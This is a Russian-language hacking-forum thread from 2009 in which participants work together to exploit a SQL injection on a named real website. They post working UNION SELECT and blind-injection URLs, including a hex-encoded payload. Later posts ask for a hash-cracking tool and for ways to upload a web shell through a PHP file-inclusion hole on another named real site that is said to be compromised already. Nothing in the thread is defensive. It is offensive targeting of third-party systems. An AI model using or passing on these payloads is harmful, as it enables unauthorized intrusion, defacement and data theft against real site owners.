11.06.2009, 22:52
|
|
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме:
1996429
Репутация:
468
|
|
Попробую id=-1[sql]
|
|
|
11.06.2009, 23:30
|
|
Постоянный
Регистрация: 21.02.2007
Сообщений: 568
Провел на форуме:
2954516
Репутация:
303
|
|
Сообщение от Krist_ALL
Попробую id=-1[sql]
Пробовал, в этом случае пропадает весь текст, остаётся только костяк сайта, вывода нет(
|
|
|
|
11.06.2009, 23:32
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Давай линк, иначе будет гадание на кофейной гуще на 10 страниц
|
|
|
|
11.06.2009, 23:46
|
|
Постоянный
Регистрация: 21.02.2007
Сообщений: 568
Провел на форуме:
2954516
Репутация:
303
|
|
_http://www.niat.ru/design/page_rus.php?id=1+union+select+1,2,3,4/*
тока не дефейсить
|
|
|
|
12.06.2009, 00:29
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802
Репутация:
380
|
|
Поле 2 и 3 отвечают за путь до изображения вверху страницы,в поле 3 проходят тока цифры и по всей видимости там либо JOIN либо сабселект или еще одна гверя так как патч до этого изображения по всей видимости береться из бд(потому как если указать от балды значения то путь до изображения идет пустой), а во втором поле идет какой то фильтр на выводимые данные потому как ничего кроме 0x2f(/) и 0x2e(.) в нем не проходят(возможно file_exists() и etc), вывод в 1-ом и 4-ом поле на страницу я не увидел, только блайнд по всей видимости, версия 5 http://www.niat.ru/design/page_rus.php?id=8+and+substring(version(),1,1)=5
|
|
|
|
12.06.2009, 00:30
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
PaCo куда торопишься? 
http://www.niat.ru/design/page_rus.php?id=11111+union+select+1,2,concat(0x3a 3a3a3a,Version()),4/*
Grey: Джок, тебе повезло, что тут вывод в сообщение об ошибке, но там двойной запрос и в идеале нужно так юзать:
Код:
http://www.niat.ru/design/page_rus.php?id=1+and+1=2+union+select+1,2,0x3120616e6420313d3220756e696f6e2073656c65637420636f6e63617428273e272c76657273696f6e2829292f2a,4/*
Позвольте, что значит повезло? Я увидел там вывод, хотя искал двойной запрос. Есть вывод-нет заморочек
Grey: так не честно 
А вообще ты так можешь паренька сильно загрузить и он может не понять, как так получилось с инъекцией, а это повлечет новые вопросы...
Последний раз редактировалось Grey; 12.06.2009 в 00:42..
|
|
|
|
12.06.2009, 03:36
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
пожалуй паренька больше загрузит непонятный хекс в 3-м поле))
Кстати встречал как то подобную скулю
|
|
|
|
12.06.2009, 12:08
|
|
Новичок
Регистрация: 03.06.2009
Сообщений: 24
Провел на форуме:
48501
Репутация:
-4
|
|
привет всем, я понимаю что на мой вопрос полюбому есть ответ в этой теме, но что бы не листать 757 страниц задам его ещё раз.
Как перевести таблицу в кеш?
Раньше пользовался http://nahta4ok.far.ru/tools.php , но вчера он закрыл свой сайт.
Может есть праги?
|
|
|
|
12.06.2009, 12:17
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
привет всем, я понимаю что на мой вопрос полюбому есть ответ в этой теме, но что бы не листать 757 страниц задам его ещё раз. Как перевести таблицу в кеш? Раньше пользовался http://nahta4ok.far.ru/tools.php , но вчера он закрыл свой сайт. Может есть праги?
а поиск поюзать?
и что за кеш? попробуй http://x3k.ru/ если конечно я тебя правильно понял
|
|
|
|
12.06.2009, 18:28
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
Здравствуйте, подскажите пожалуйсто как можно залить шел через PHP иньекцию
Вот уязвимый сайт
http://www.cyl.ru/index.php?page=3&lang=../%00
Взял я его из раздела PHP иньекции.
Там уже залит шел, мне просто интеренсно, каким способом.... |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
